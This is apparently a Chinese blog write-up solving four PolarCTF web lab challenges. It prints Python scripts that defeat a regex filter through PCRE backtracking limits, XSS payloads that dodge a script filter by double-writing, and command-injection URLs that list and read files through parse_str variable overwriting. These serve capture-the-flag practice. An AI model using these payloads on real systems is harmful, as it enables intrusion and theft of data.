polarctf靶场【web】swp、召唤神龙、浮生日记、干正则

最新推荐文章于 2024-07-22 16:46:01 发布
最新推荐文章于 2024-07-22 16:46:01 发布
阅读量1k 收藏 17
点赞数 26
分类专栏: polarctf靶场 wp 文章标签: 前端 js python web xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73981089/article/details/138520071
版权

[web]swp

考点:敏感文件、preg_match()函数绕过

什么是swp文件:

vim中的swp即swap文件,在编辑文件时产生,它是隐藏文件。这个文件是一个临时交换文件,用来备份缓冲区中的内容。如果原文件名是data,那么swp文件名就是.data.swp。如果文件正常退出,则此文件自动删除。需要注意的是如果你并没有对文件进行修改,而只是读取文件,是不会产生swp文件的。强行关闭vim时,vim自动生成一个swp文件,当源文件被意外删除时,可以利用swp文件恢复源文件。

依据题目的提示,可能存在swp文件,用kali dirsearch工具扫一扫

得到的子域,将其访问


function jiuzhe($xdmtql){ //接受一个xdmtql变量
    return preg_match('/sys.*nb/is',$xdmtql); //匹配变量
}

$xdmtql=@$_POST['xdmtql']; //判断变量是否为数组类型,不为数组类型往下判断
if(!is_array($xdmtql)){  //利用jiuzhe函数进行匹配输入的值
    if(!jiuzhe($xdmtql)){
        if(strpos($xdmtql,'sys nb')!==false){  //绕过 preg_match函数后匹配变量,匹配到的话输出flag
            echo 'flag{*******}';
        }else{
            echo 'true .swp file?';
        }
    }else{
        echo 'nijilenijile';  //匹配到/sys.*nb/is的话输出
    }
}

考虑如何同时绕过pre_match()和strpos()函数,不pre_match()让匹配到,一个又要strpos()匹配到。是个回溯问题,由于pre_match()函数处理的字符长度有限,如果超过这个长度就会返回false也就是没有匹配到,所以我们写一段代码,让pre_match()函数报错,绕过该函数,这样strpos()函数就可以顺利的匹配到我们的字符串从而输出flag

import requests
url = 'http://b0533b47-df70-46d3-8840-0aba3ecc326b.www.polarctf.com:8090'
data = {
    'xdmtql': 'sys nb' + 'very' * 250000
}
r = requests.post(url=url, data=data).text
print(r)

或者

import requests
data = {"xdmtql": "sys nb" + "aaaaa" * 1000000}
res = requests.post('http://b0533b47-df70-46d3-8840-0aba3ecc326b.www.polarctf.com:8090/', data=data, allow_redirects=False)
print(res.content)

​便可得到flag

[web]召唤神龙

考点:jsfuck

什么是JSFuck?

JSFuck是基于JavaScript原子部分的深奥和教育性编程风格。它仅仅使用六个不同的字符来编写和执行代码。

分别是:{​ }​ [​ ]​ +​ !​
它不依赖于浏览器,因此可以在Node.js上运行。

打开网址,发现是js小游戏,先查看源码,没有可以利用的信息,然后用调试器查看,看到main.js有一串明显的jsfuck

1.将其用工具进行解码
2.也可以直接控制台译出

便可得到flag

[web]浮生日记

考点:xss

根据源码的提示

试试xss语句,输入,发现过滤了script

<script>alert(1)</script>

 

运行后发现script被过滤,进行双写绕过,发现没有显示

<scriscriptpt>alert(1)</scriscriptpt>

那就先闭合value值,再双写绕过

"><scriscriptpt>alert(1)</scriscriptpt>

成功弹窗点击确定即可跳转到flag页面得到flag

[web]干正则

考点:parse_str变量覆盖

@parse_str($id); 这个函数不会检查变量 $id 是否存在,如果通过其他方式传入数据给变量$id ,且当前$id中数据存在,它将会直接覆盖掉

发现a[0]的值确实被更改了,那么接下来就简单了,先构造一个cmd=|ls;,发现回显了flag.php,但是不能直接读取,我们尝试用读取ls的命令

?id=a[0]=www.polarctf.com&cmd=|cat `ls`;//回显之后直接点击源码便可得到flag

?id=a[]=www.polarctf.com&cmd=|ls //发现有flag.php,但是不能直接读取
?id=a[0]=www.polarctf.com&cmd=;cat%20flag*
或?id=a[0]=www.polarctf.com&cmd=;cat%20fl''ag.php


?id=a[0]=www.polarctf.com&cmd=;tac f* //可直接读取flag

 得到flag

剁椒排骨
关注
  • 26
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
中国电信移动终端测试方法 - NFC-SWP功能分册
01-03
《中国电信移动终端测试方法 - NFC-SWP功能分册》是中国电信集团公司发布的一份技术文档,主要针对移动设备中NFC(Near Field Communication,近场通信)功能的SWP(Secure Element,安全元件)部分进行详细测试规范...
swp.c.zip_swp
09-19
标题 "swp.c.zip_swp" 提供的信息表明这是一个与 C 语言实现滑动窗口算法相关的压缩文件。滑动窗口算法是一种在数据处理和计算机科学中广泛应用的技术,特别是在网络协议、数据流分析、字符串匹配等领域。它涉及到在...
Web】记录Polar靶场<简单>难度题一遍过(全)
uuzeray的博客
04-01 1747
明天XYCTF开始,今天啥也不是,过过签到八股吧。
polar CTF web swp
samRsa
01-03 376
polar CTF web swp 首先网站用post方式接受了一个xdmtql变量,用if判断变量是否是数组,不是数组接下来交给jiuzhe函数,这个函数的作用是去匹配变量里的sys nb,匹配到了就输出nijilenijile,没有匹配到就进入下一个if语句,strpos这个函数的作用是匹配sys nb如果匹配到了,就输出ture然后由于有!所以变成false条件成立输出flag。这里就涉及到一个回溯问
polarctf靶场web】login、被黑掉的站、GET-POST、网站被黑、robots
m0_73981089的博客
04-26 720
sal查询,bp爆破,目录扫描,get-post简单传参
CTFSHOW系列-web9(信息收集-swp泄露)
siu~
11-25 476
CTFSHOW系列解题思路
CTF--Vim文件泄露(.swp备份文件)
热门推荐
woshisz0413的博客
11-27 1万+
漏洞出现提示: (1)源码中出现 思路: 说明可能存在.swp备份文件,正常URL:xxx/index.php 则尝试URL:xxx/index.php.swp下载.swp文件代码 并使用vim打开,打开命令:vim -r index.php.swp 打开后则发现源码,进行代码审计 ...
Swp.rar_swp
09-19
标题中的"Swp.rar_swp"暗示我们关注的焦点是一个名为"Swp"的VHDL程序,它被压缩在RAR文件中。VHDL(VHSIC Hardware Description Language)是一种广泛用于电子设计自动化领域的硬件描述语言,它允许工程师用高级语言...
swp_emulate.rar_swp
09-23
在IT行业中,SWP指令是ARM处理器架构中的一个关键原语,用于原子操作。这个"swp_emulate.rar_swp"文件集似乎关注的是通过ldrex/strex指令序列来模拟SWP指令的功能。这里我们将深入探讨SWP指令、ldrex/strex指令以及...
SWP.rar_SWP-NFC_sliding window_swp
09-21
SWP(Sliding Window Protocol)通常与NFC(Near Field Communication)技术结合,用于短距离无线通信场景,如手机支付、数据传输等。 在NFC环境中,SWP协议的应用是为了确保数据的正确传输和避免数据丢失。NFC技术...
polar靶场通关笔记
weixin_43296565的博客
06-06 5330
这里是关于自己打polar靶场的小笔记
PolarD&N-CTF-web方向-简单
J1ng_Hong的博客
12-06 2665
所以bp的方法就不行了。然后源码看了好久都没找到id=9的地方,并且我还尝试传入id这个参数。post传参一个yyds=666,这是不会被检测的。这就是说我们需要post一个名为xdmtql的变量,然后这个变量不能是数组。然后发现有一个index.php,然后发现根目录有一个flag的文件。然后发现了一个叫做/.index.php.swp的备份文件。这就说明,如果换行符应该是不会被检测的。虽然很多乱码,但是flag还是包含在里面的。要匹配 . ,请使用 \.。然后就得到了flag。然后就得到了flag。
polarctf靶场web】签到题、简单 rce、蜜雪冰城吉警店、到底给不给flag呢
m0_73981089的博客
04-24 1263
此时注意GET数组的值,$ _GET["flag"]=Polar​,而经过$_POST​的变量覆盖,​$ _GET =array(1) { ["flag"]=> string(4) "flag" }<span> </span>​,故而最开始传GET参数时?并且value不能等于flag,若想输出执行到最后输出flag,那么变量覆盖时候不能将$flag 的值等于除flag 外的任意值,也就是说在foreach内的变量覆盖过程,需要实现。这样被解析之后,就是c=flag&flag=c。方法二:字符串转义绕过;
CTF-web题 VIM影藏flag
最新发布
2302_80276789的博客
07-22 154
可以看出该题目和vim有关,在源代码也看不出看来,因此我们就要打开一个虚拟机ubuntu,打开终端,而vim是linux中一个编写文档的工具可以写vi或者vim,再没保存前相当于一个文件的备份,若主动关闭或关机并且不保存则会留下备份,但是若由于输入wq退出则会销毁备份。如上,虽然加了,但是内容没有变,那么由于vim异常关闭,则备份文件应该是index.php.swp。我们进行访问,会发现会给我们下载一个文件。着题使用了一个vim,则应该存在一个.文件名.swp的一个备份文件,接下来就要知道文件名是什么了。
CTF 题目信息收集
Senimo
03-28 1810
CTF 题目信息收集信息收集分类敏感目录泄露git泄露 信息收集 在线上CTF比赛Web类题目中,信息收集涵盖的面非常广,同时非常重要。 分类 敏感目录泄露 通过泄露的敏感目录,可以获取网站的源代码和敏感的URL地址,如后台地址等。 git泄露 漏洞简介: git是一个主流的分布式版本控制系统,在开发过程中,可能会遗忘.git文件夹。从而导致提交过的所有代码被泄露。 漏洞危害: 若文件中包含有敏感信息,如站点源码、数据库账户密码等,攻击者可直接控制服务器。 .git文件夹分析: // 文件夹 hook
ctf web基础php
qq_61988806的博客
09-19 561
1.数组绕过?zx[]=admin2.换行符绕过?3.利用PCRE回溯次数限制绕过这里is_arry过滤数组。
CTF学习日记(2)
NUC_zlt的博客
11-01 1258
CTF学习日记第二次总结
关于swp文件
时光漫走
11-18 1335
关于swp文件:使用vi,经常可以看到swp这个文件,那这个文件是怎么产生的呢,当你打开一个文件,vi就会生成这么一个.(filename)swp文件以备不测,如果你正常退出,那么这个.(filename)swp文件将会自动删除。 因此.(filename)swp文件就是你没有正常退出vi或者vim编辑器时留下来的!比如:强行关闭vi或vim时,电源突然断掉,或者你使用了Ctrl-zz。 出现
CTF学习之信息搜集
DMHY123的博客
09-25 849
CTF基础信息搜集
swn swo swp 嘛的
11-30
swn, swo, swp是临时隐藏文件,通常由文本编辑器(如vi或vim)在编辑文件时自动生成。这些文件的作用是在编辑期间保存文件的临时状态,以便在编辑器意外崩溃或关闭时恢复文件。swn, swo, swp文件分别代表不同的编辑器会话,其中swp是最初的临时文件,swo是第二个会话的文件,以此类推。这些文件通常可以安全地删除,因为它们只是用于恢复编辑器会话的临时文件。如果您想要删除这些文件,可以使用rm命令,例如:rm *.swp
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

剁椒排骨

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值